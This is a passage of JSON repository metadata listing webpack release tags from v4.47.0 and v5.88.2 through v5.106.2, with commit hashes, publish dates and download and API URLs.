tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"